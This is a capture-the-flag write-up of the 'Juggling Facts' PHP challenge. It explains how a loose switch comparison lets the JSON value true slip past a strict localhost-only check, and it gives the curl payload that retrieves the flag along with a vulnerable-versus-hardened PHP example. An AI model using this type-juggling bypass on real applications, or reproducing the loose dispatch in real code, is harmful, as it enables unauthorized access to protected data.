Pierre Gaulon

[Web] Juggling Facts

This web application is written in PHP and serves "facts" from an API endpoint. The router registers two routes:

    $router = new Router();
    $router->new('GET', '/', 'IndexController@index');
    $router->new('POST','/api/getfacts', 'IndexController@getfacts');

The getfacts function returns the flag only when the type key in the JSON payload is the string secrets (checked with the strict === comparison), and that case is additionally restricted to requests whose source IP is local (127.0.0.1):

    public function getfacts($router)
    {
        $jsondata = json_decode(file_get_contents('php://input'), true);

        if ( empty($jsondata) || !array_key_exists('type', $jsondata))
        {
            return $router->jsonify(['message' => 'Insufficient parameters!']);
        }

        if ($jsondata['type'] === 'secrets' && $_SERVER['REMOTE_ADDR'] !== '127.0.0.1')
        {
            return $router->jsonify(['message' => 'Currently this type can be only accessed through localhost!']);
        }

Once that validation passes, the value of type is fed into a switch statement that dispatches to the corresponding method:

        switch ($jsondata['type'])
        {
            case 'secrets':
                return $router->jsonify([
                    'facts' => $this->facts->get_facts('secrets')
                ]);

The problem is that PHP's switch compares its cases with loose equality (==), so it is vulnerable to type juggling (hence the name of the challenge). Setting type to the JSON boolean true passes the validation, because true === 'secrets' is false and the localhost restriction is never triggered, yet true == 'secrets' is true (a non-empty string is truthy), so we still land in the first branch of the switch:

    $ curl -vd '{"type":true}' 178.62.85.130:32116/api/getfacts
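To see the strict guard and the loose switch side by side, here is an added PHP example (not the challenge's source, written for this writeup) that reproduces the dispatch logic and shows a hardened variant; it assumes PHP 8 (for match), and the function names and the extra public type are hypothetical.

```php
<?php
// Added example, not the challenge's code: a loose switch dispatch like the
// one in getfacts(), next to a hardened version. Function names and the
// 'public' type are hypothetical; only 'secrets' and the JSON handling
// mirror the writeup above.

// Vulnerable: switch uses loose comparison (==), so the JSON boolean true
// matches the 'secrets' case even though true === 'secrets' is false.
function dispatch_loose(array $jsondata): string
{
    switch ($jsondata['type']) {
        case 'secrets':
            return 'secrets';
        case 'public':
            return 'public';
        default:
            return 'default';
    }
}

// Hardened: refuse anything that is not a string before dispatching, then
// compare strictly. match() always uses === for its arms.
function dispatch_strict(array $jsondata): string
{
    if (!is_string($jsondata['type'] ?? null)) {
        return 'rejected';
    }
    return match ($jsondata['type']) {
        'secrets' => 'secrets',
        'public'  => 'public',
        default   => 'default',
    };
}

// Constructed request bodies: the legitimate one, the type-juggled one,
// and an unrelated type.
$bodies = ['{"type":"secrets"}', '{"type":true}', '{"type":"public"}'];
foreach ($bodies as $body) {
    $jsondata = json_decode($body, true);
    // Same guard as the challenge: the strict check only fires for the exact string,
    // so the boolean sails past it while still matching the loose switch.
    $guard = ($jsondata['type'] === 'secrets') ? 'localhost-only' : 'open';
    printf("%-20s guard=%-14s loose=%-8s strict=%s\n",
        $body, $guard, dispatch_loose($jsondata), dispatch_strict($jsondata));
}
```

The is_string check is the important part of the fix: it closes the gap for every non-string JSON value, not just true, and the strict guard and the dispatch then agree on what counts as the secrets type.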